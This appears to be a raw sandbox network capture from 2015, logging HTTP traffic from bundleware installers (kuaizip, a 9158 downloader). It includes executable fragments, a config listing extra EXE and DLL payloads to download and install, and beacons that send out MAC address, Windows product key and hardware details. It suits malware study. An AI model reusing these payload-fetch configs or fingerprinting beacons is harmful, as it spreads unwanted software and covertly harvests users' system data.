.K...... ...y..F.W"v.u:Ji......e..w.Pc.....4z.T._..f.<@k[/......i..
...a.q.x...!7..npZ...............[.....!l........9'..'.A.....er..$9...
l.^.x....'.r9..E)[email protected]_...n...}Grq..~.-......\...&.H..M=f%..k4
,.m.1.... r..R...7..u....j...B.....w......u.p4S.....d.&...(UY..9.i.Y..
..If.(..-..0re....c6C.....4(..i*T;3,..1.'"|.8.;...B..>O._..e.......
.>.$...R.HU...c.9..0..7.6Y....p.P...s....r|,..0..oz.E..J.Vw....M..h
.>.k.D...;...].....1.{E..VM:[email protected]@~;...nB..4.....H..oJ...3<
;.O..2..&.l8.:.o.yN...y.....*..F.G.^a$w....9!.R..../e.gG..Y<{..".'5
............C......v...4..-.P_.. .q..#,.j...>|. ....v...#.m.W..b...
....2`..m......Z.....{xo....."...].......]......,;.Q..'p...dC..$.I..\.
....l..uWzt....p..Hpj...$....b...z. ....1.....u..v.B.T.-O.r'T...=_..b.
..._...,......Z....y....^j....yl^.Z..-.I.3`6.W.>p)._..._Q..G;.B. .3
....a.=..)"$..........L.;..Jc.6.UU..C.sQ...`.=....q.Gc.......UI.y.eE#2
*_.!....O.(0..... eA...sT....#'.xA.}./.6h:...,3..e...k.Z.(....6...O..3
T.(o....>5I=..`};..a.............GE....c...........'..f....Uz1.....
....~.W.u.Ff...I...7.V.4.. .s@R...'...>ML.N...@.([email protected]
<<< skipped >>>


GET /rd.htm?id=1384659&r=http://VVV.baidu.com/ HTTP/1.1
Referer: hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: cnrdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Tue, 13 Oct 2015 22:40:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
186f..<!DOCTYPE html>.<html>.<head>..<title>CN
ZZ...............................................................</
title>..<meta charset="utf-8" />..<meta http-equiv="X-UA-C
ompatible" content="IE=edge,chrome=1" />..<meta content="yes" na
me="apple-mobile-web-app-capable"/>..<meta content="yes" name="a
pple-touch-fullscreen" />..<meta name="keywords" content="cnzz,.
...........,............,............,............,.........,......,..
..........,............,......,............,seo,............,.........
,.........,............" />..<meta name="description" content="C
NZZ...................................................................
......................................................................
................................................." />..<meta nam
e="author" content="cnzz" />..<meta name="copyright" content="ww
w.cnzz.com" />..<link href="hXXp://VVV.cnzz.com/favicon.ico" rel
="shortcut icon" />..<link href="hXXp://img.cnzz.net/adt/cnzz_rd
/transfer.css" rel="stylesheet"/>.</head>.<body><scr
ipt>.with(document)with(body)with(insertBefore(createElement("scrip
t"),firstChild))setAttribute("exparams","category=&userid=&aplus&yunid
=&&trid=0a930d6b14447760195441096e&asid=AQAAAABTiB1W4OvTSwAAAADjl4Sm/i
xrbA==",id="tb-beacon-aplus",src=(location>"https"?"//g":"//g") ".a
licdn.com/alilog/mlog/aplus_v2.js").</script>...<div class="t
ransfer">...<div class="transfer-inn">....<img src="ht
<<< skipped >>>


GET /stat/index.php?pcid=e06b40e4c7ee2608455420c2f88bfbce&app=kuaizip&ver=2.8.2.3&channel=7654_1061607&category=Update.exe&act=app_install_done&p1=&p2=&key=7952a2e8dadfb792f70878eadfb58a92 HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Host: stat.kpzip.com
Cache-Control: no-cache


HTTP/1.1 400 Bad Request
Server: nginx/1.4.1
Date: Tue, 13 Oct 2015 22:41:11 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
<html>..<head><title>400 Bad Request</title>&l
t;/head>..<body bgcolor="white">..<center><h1>400
 Bad Request</h1></center>..<hr><center>nginx/
1.4.1</center>..</body>..</html>....



GET /rd.htm?id=1490574&r=http://VVV.baidu.com/ HTTP/1.1
Referer: hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: cnrdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Tue, 13 Oct 2015 22:41:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
186f..<!DOCTYPE html>.<html>.<head>..<title>CN
ZZ...............................................................</
title>..<meta charset="utf-8" />..<meta http-equiv="X-UA-C
ompatible" content="IE=edge,chrome=1" />..<meta content="yes" na
me="apple-mobile-web-app-capable"/>..<meta content="yes" name="a
pple-touch-fullscreen" />..<meta name="keywords" content="cnzz,.
...........,............,............,............,.........,......,..
..........,............,......,............,seo,............,.........
,.........,............" />..<meta name="description" content="C
NZZ...................................................................
......................................................................
................................................." />..<meta nam
e="author" content="cnzz" />..<meta name="copyright" content="ww
w.cnzz.com" />..<link href="hXXp://VVV.cnzz.com/favicon.ico" rel
="shortcut icon" />..<link href="hXXp://img.cnzz.net/adt/cnzz_rd
/transfer.css" rel="stylesheet"/>.</head>.<body><scr
ipt>.with(document)with(body)with(insertBefore(createElement("scrip
t"),firstChild))setAttribute("exparams","category=&userid=&aplus&yunid
=&&trid=0a930d6b14447760704724219e&asid=AQAAAACGiB1WN1Z/TAAAAACKDLqMm3
20Kw==",id="tb-beacon-aplus",src=(location>"https"?"//g":"//g") ".a
licdn.com/alilog/mlog/aplus_v2.js").</script>...<div class="t
ransfer">...<div class="transfer-inn">....<img src="ht
<<< skipped >>>


GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=0-1356514


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 0-1356514/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\...........2.......p....@.........................
. ......=........................................s...........d........
...x..@............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>[email protected].>[email protected]
...Pr@..}..e..9}[email protected]........ M............U....M....3..
.3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M..
[email protected]@..u....E..9}[email protected].}.j
[email protected]@[email protected] ...Pj.h.6B.W..Xr@.
.u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.
;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>


GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=9495605-10852119


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 9495605-10852119/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
HTTP/1.0 206 Partial Content..Date: Tue, 13 Oct 2015 22:41:22 GMT..Con
tent-Type: application/octet-stream..ETag: "-501244861"..Accept-Ranges
: bytes..Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT..Server: WS CDN 
Server..Content-Range: bytes 9495605-10852119/10852120..Content-Length
: 1356515..Age: 1..Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 js
ly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.
0)..Connection: keep-alive..^...&..e. .P..._...1..g'...?..H.....'.....
.{j..c.......w.....Th?.9....F..._9sN..T/.....[EW...c..HLV=.L.<9.0..
...n.F.5....I.`a<9U....:...t".E......%w..|z.h..Ei..a.G.]..$p.P..T.s
 @U...>vf.5.T_.....T.....0...b.....T....W...V........*..Q....-N.d..
..}..I.k.r._.......o.....I..~...X.|....`.y....LA.....A:^....".y..'.r..
....2?.H_&.L. ..6X...Ju']..l...g..jU.i..ip........:^........m........O
{.._?f..)..l;h..\u........H [email protected].}...L....1..'K....x}F..:O..
..;..O...:^N....%.@[email protected].].....%K.3..g.............:`[email protected]
r.l.QwT.R..<....>.3...J../....K~KS.?....P...=x,..2_.....2KW'..(.
.....r...0.d...v.0.vd...>?{.r......Qvp....J....".q/....T[:.[.m.2...
....X..5 ....hT..|.....t....l..,.%.cb.s|E.-...U...#..%E'.....BUS.U....
..Q..:.....<..kcgg...K........................-D8........A..Xic|..L
I...qS...h.H.\br.k_v..4L...;..:[......O"l..." .Y.1..|....V0..,../,....
.=....U,..k.U[~3wy................*..k...~........^......;...n.......(
.a..{...........awE..]..>e.FT.c...\_...'Ci.....y.....H.....b...LO..
./.?....m.....&....V..^.W%".....n ..d.3.3........:..xZA.t.i..ZB(x.
<<< skipped >>>


GET /n/install/tui/show_7654.txt HTTP/1.1
User-Agent: VsyDownload/1.0
Host: i.kpzip.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Expires: Wed, 14 Oct 2015 22:41:05 GMT
Date: Tue, 13 Oct 2015 22:41:05 GMT
Server: nginx/1.4.1
Content-Type: text/plain
Content-Length: 849
Last-Modified: Wed, 30 Sep 2015 06:16:27 GMT
ETag: "560b7e3b-351"
Cache-Control: max-age=86400
Accept-Ranges: bytes
X-Via: 1.1 jfzh182:88 (Cdn Cache Server V2.0), 1.1 kf50:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[Config]..MaxNumber=6..[ConfigEnd]..[Product]..Name=360dh..Display=...
.......Url=hXXp://i.kpzip.com/n/tui/site/site.exe..Command=..Type=..ID
=30..Show=1..BlockedProcessList=..InjectBlockedProcessList=..Reg=..[En
d]..[Product]..Name=jzllqdll..Display=............Url=hXXp://i.kpzip.c
om/n/install/tui/juziliulanqi/JuZi.dll..Command=..Type=..ID=30..Show=1
..BlockedProcessList=..InjectBlockedProcessList=..Reg=HKEY_CURRENT_USE
R\Software\Microsoft\Windows\CurrentVersion\Uninstall\{C5E2255C-66FA-4
187-8EB6-5176247C4723}..[End]..[Product]..Name=bdsrfdll..Display=.....
.......Url=hXXp://i.kpzip.com/n/install/tui/baidushurufa/bdimesetupsta
ndalone.dll..Command=..Type=..ID=30..Show=1..BlockedProcessList=..Inje
ctBlockedProcessList=..Reg=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo
ws\CurrentVersion\Uninstall\BaiduPinyin..PrivateParam=1202000325..[End
]..HTTP/1.1 200 OK..Expires: Wed, 14 Oct 2015 22:41:05 GMT..Date: Tue,
 13 Oct 2015 22:41:05 GMT..Server: nginx/1.4.1..Content-Type: text/pla
in..Content-Length: 849..Last-Modified: Wed, 30 Sep 2015 06:16:27 GMT.
.ETag: "560b7e3b-351"..Cache-Control: max-age=86400..Accept-Ranges: by
tes..X-Via: 1.1 jfzh182:88 (Cdn Cache Server V2.0), 1.1 kf50:4 (Cdn Ca
che Server V2.0)..Connection: keep-alive..[Config]..MaxNumber=6..[Conf
igEnd]..[Product]..Name=360dh..Display=..........Url=hXXp://i.kpzip.co
m/n/tui/site/site.exe..Command=..Type=..ID=30..Show=1..BlockedProcessL
ist=..InjectBlockedProcessList=..Reg=..[End]..[Product]..Name=jzllqdll
..Display=............Url=hXXp://i.kpzip.com/n/install/tui/juziliu
<<< skipped >>>


GET /stat/index.php?pcid=e06b40e4c7ee2608455420c2f88bfbce&app=kuaizip&ver=2.8.2.3&channel=7654_1061607&category=Update.exe&act=app_update_run&p1=&p2=&key=5a29521d4b9ed90e33fc5625167fd0db HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Host: stat.kpzip.com
Cache-Control: no-cache


HTTP/1.1 400 Bad Request
Server: nginx/1.4.1
Date: Tue, 13 Oct 2015 22:41:08 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
<html>..<head><title>400 Bad Request</title>&l
t;/head>..<body bgcolor="white">..<center><h1>400
 Bad Request</h1></center>..<hr><center>nginx/
1.4.1</center>..</body>..</html>....



POST /kuaizipreport/install?code=NzY1NF8xMDYxNjA3MTUxMDE0CTJDRkU4N0JGNjgyNENGRDEyOTQ0MjhBQTc5NTBBQ0IxCUtaUmVwb3J0LmV4ZQlLdWFpWmlwCTIuOC4yLjMJMDAwMDAwMDAwMDAwMDAwMDAwMDEJMEZFQkZCRkYwMDAzMDZDMwkwMC0wQy0yOS04QS04Qi0zNwlNaWNyb3NvZnQgV2luZG93cyBYUA== HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Tue, 13 Oct 2015 22:40:40 GMT
c..{"status":1}..0..



GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=4069545-5426059


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 4069545-5426059/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
HTTP/1.0 206 Partial Content..Date: Tue, 13 Oct 2015 22:41:22 GMT..Con
tent-Type: application/octet-stream..ETag: "-501244861"..Accept-Ranges
: bytes..Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT..Server: WS CDN 
Server..Content-Range: bytes 4069545-5426059/10852120..Content-Length:
 1356515..Age: 1..Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsl
y59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0
)..Connection: keep-alive........4.T...V....Li...q..M..p.........1..I4
;Hs....#.v...sc..Nl2f<.w.Ib.sO,......)c_...`U..X0.ixc....`..4Z..D.h
.aX>.1.(...m.l2.k1..5............v!.]<(...Y.3...)..y.~....O....J
Q1i/..EII.DD.X/^/7.!...O.w.u!^zSZM...|..c.....O.UX..v.H........k......
.*]<..G.._.&a....s\.l.'.z...L/....C..<..HK.z......~4........<
e?......T.&..........z.......<&t..M|.%......._.o...;..h...pl...a...
..r..7ej..7.../.VR ...Ivs..".O.Q.H...XPBc,_.=[..23...4.q..W..QV......#
.R...NLs<5.eb.k...n.W..I....kt@,([.F.[,..e..V.....6..y-......x.....
.........Wk.#..E.!.!.....u5H<.b....&...$.7.y.V50zI..H...Ev...N;BQ..
."..b{....f^..T..#.s...n...1...I*...#RuS..AY...n....V..........7d..J..
.-:B.-.9..6nQ...l..meU..q....."...n.E.B>..Ka,..nc,;<...<n3...
8....RQ.^Hi.g..j..~.}[email protected],4.....u,..%g..`%....V[n...P..8oR..\....
..V.ok.{.....U..%........1.T...|<...6Q...b..5'..#uL.R.6G.9.m.......
(.s1...H.Lvn........(.....c...F....U....C..$.T.#{..x.......h.6L.V.....
X...DE....H..AA.....F\...jN.'...^4........}.R.g..Z5..M.e}...'..A7...."
[email protected]......}nUt./ ..q.a........o1......h...)&..&...-Uz..P
<<< skipped >>>


GET /rd.htm?id=1486675&r=http://VVV.baidu.com/ HTTP/1.1
Referer: hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: cnrdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Tue, 13 Oct 2015 22:41:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
186f..<!DOCTYPE html>.<html>.<head>..<title>CN
ZZ...............................................................</
title>..<meta charset="utf-8" />..<meta http-equiv="X-UA-C
ompatible" content="IE=edge,chrome=1" />..<meta content="yes" na
me="apple-mobile-web-app-capable"/>..<meta content="yes" name="a
pple-touch-fullscreen" />..<meta name="keywords" content="cnzz,.
...........,............,............,............,.........,......,..
..........,............,......,............,seo,............,.........
,.........,............" />..<meta name="description" content="C
NZZ...................................................................
......................................................................
................................................." />..<meta nam
e="author" content="cnzz" />..<meta name="copyright" content="ww
w.cnzz.com" />..<link href="hXXp://VVV.cnzz.com/favicon.ico" rel
="shortcut icon" />..<link href="hXXp://img.cnzz.net/adt/cnzz_rd
/transfer.css" rel="stylesheet"/>.</head>.<body><scr
ipt>.with(document)with(body)with(insertBefore(createElement("scrip
t"),firstChild))setAttribute("exparams","category=&userid=&aplus&yunid
=&&trid=0a930d6b14447760727944381e&asid=AQAAAACIiB1WidbmPQAAAADoCg9seK
dwAQ==",id="tb-beacon-aplus",src=(location>"https"?"//g":"//g") ".a
licdn.com/alilog/mlog/aplus_v2.js").</script>...<div class="t
ransfer">...<div class="transfer-inn">....<img src="ht
<<< skipped >>>


GET /Opendownloadernewxml.aspx?softlist=&lmarkid=97 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vmguug55irtjcdnc010df1bg; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 kf50:10 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Ti
tle>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.915
8.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>h
ttp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>
...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...&l
t;ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>htt
p://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTip
s>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...
<Setuptime>20</Setuptime>...<ToolIcon>9158........&l
t;/ToolIcon>...<Item>9158ktv</Item>...<Mtype>19&l
t;/Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.h
tml</ErrorUrl>...<check>....<visible>1</visible&g
t;....<choice>1</choice>....<checkName>........</
checkName>....<downUrl></downUrl>...</check>...&l
t;check>....<visible>1</visible>....<choice>1<
/choice>....<checkName>........</checkName>....<down
Url></downUrl>...</check>..</config>......
<<< skipped >>>

GET /temp/downloaderico/main.ico HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=vmguug55irtjcdnc010df1bg


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 17:57:30 GMT
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:6bee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Via: 1.1 kf48:7 (Cdn Cache Server V2.0)
Connection: keep-alive
............ .h...F......... .........  .... .....6...00.... ..%......
(....... ..... .........................p^...g...j..vT..vR...`...j...e
..uH..vH...d...c...U..k?..eA..lU.*.g...........}...j...q...........]..
.c...........]..|P..qF..nL...d...............{...t...........m...u....
...e...v...}......tK..z^...z...............}......D....h...p...d..xF..
.............^..x]...q...}..................C...c@....................
.......Q...n.......x...w..........X%...u..D....o...................p..
f=...m...............k...k..W...l(..O...F................n..~]..lH...a
...~...................o...p..g...O....|...............z..uT..vS..._..
.d...c...l..............\...]....................s..nO...^...u........
...............m..X....M...............v..{a..dF...f..................
.]...]..c...R...o8...................{..qR...^...z.......]............
..m1..L....c......................vX..wO...p......................Z...
g/.......................t..rS..sI...........................i........
...................v..hG..tK...f...........~..........................
.............d.._?..o\..pB..~D...C...D...M...N...L...N...R...Q...L...M
..}K..iC..nX.'........................................................
........(.......0..... .............................p].4{c...g..uS..sO
..sN..sM...d...d...c...]..qD..qD..rD..._...^...^...\[email protected]>..gF..m
X.R....o].(.h...w.......z...a..._...]...s...|...z...v...S...R...X...u.
..t...t...c..yJ..qD..f:..d>..oZ.Myb...w...............|...n...l...v
...............a..._...l..............._...W..}Q..uJ..vL..mM..y_..
<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=1444776090&flag=1535c21d33e8ce981555bdde9441bd26&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vmguug55irtjcdnc010df1bg


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:41:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 kf50:10 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body>..    <form
 name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=ie
xplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Window
s XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-
8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-
4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&
;Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=144477609
0&flag=1535c21d33e8ce981555bdde9441bd26&status=1&qqnumber=
&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id=
"form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTAT
E" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />.
.<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGE
NERATOR" value="05019BFC" />..    <div style="text-align:center"
>..    <img  title="webgo"..    </div>..    </form>.
.</body>..</html>......


GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=1444776094&flag=d1166baaa7732532f9b63d7b1cd42fd4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1


User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vmguug55irtjcdnc010df1bg


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:41:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 kf50:10 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body>..    <form
 name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=ie
xplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Window
s XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-
8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-
4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&
;Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=144477609
4&flag=d1166baaa7732532f9b63d7b1cd42fd4&status=2&qqnumber=
&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id=
"form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTAT
E" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />.
.<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGE
NERATOR" value="05019BFC" />..    <div style="text-align:center"
>..    <img  title="webgo"..    </div>..    </form>.
.</body>..</html>......


GET /temp/flash/1.swf HTTP/1.1


Accept: */*
Accept-Language: en-US
Referer: hXXp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=vmguug55irtjcdnc010df1bg


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 17:57:43 GMT
Content-Length: 418788
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 13 Nov 2013 05:43:32 GMT
Accept-Ranges: bytes
ETag: "a8cfcc4933e0ce1:6bee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Via: 1.1 kf48:7 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.k...x...wXS[.8.C..7. H'tPzW..& .^[email protected].( .RTz.."*M..Jh7D
=.........}.?.........Yk...8...].@D.....&.......c...g......g....z.....
.b...Y..Z....``..a-..".-..R'&... .....:....:.S... '.`.^. I.M...b<..
...... =....._.j.p'....p.<.....a*.e..s.......)E.DQB...C.%.N......[.
...AK..?.U...B........q.9........W.bx..Mi..?....~..K.g,W.r...4.....%..
8G.,&.k.9111.19..9..)....99..3.....3.9.~..=.(..(().))..))).O.%........
...1p....x.<....t..;T..v...K...~.....>.!.1.).._.........>....
G@DHL.&...i......5cG:..(IB...ju^>..6')i..~...).........'W.5S...^>
;D.2...r.^s.. rnS[.N.......[.u....-\.o.......-.c...s...ct~.....z......
@...7.........dT2...m&..R|N...).........'.......:...Y.\............p&l
t;...q...T.or..B.F.Qc......../.Z@...).w/...Q.;.2....4....HK...&. -k../
].....} jv..|....'S...../..<........_..9.h.7*.P...')'.wp....k... ..
.d..1......N.y.9.%....IA..0ue.N..6Q]..[^..j...\..VN.M..m./...k6[.!.FRN
-.!..3..{lA5y......!w....T..{<....Y...M.. j..<...p}'}..j..D..5.)
.*...^..<D".2.;....a!..... {.~..>.......,T.....K1v..KTObo.x.....
.Z.:X..w...'(\...k.yXL.. -....}.DVaZ.....1.G....g{.....U;.a.2.n.......
.I./*{.../......Rjj.~0....T...n..0,..o.g.$..Z.L....z...Q..N.;.C.....&.
..)z6k.#...}.......<.=^.}|N&,...#..zu..dl.FS%|<..}....k. E.9;..S
.u3].\Z...>.9US.x......'u,.....j4.......o.v1............s.Z:..p/1..
[email protected]`a......1..-..>upmG.2>...q.n.*....-qC...P...4I..
.....x./)W S..c.....,...\.&....0...i.I...9.....c.9n.....X....A..Wj....
...FM.W.....-..}.=.)..N..^.........co/.Go...b...{.b...:.k..a>.s
<<< skipped >>>


GET /ptlogin/ver/10136/js/xui.js?v=10007 HTTP/1.1
Accept: */*
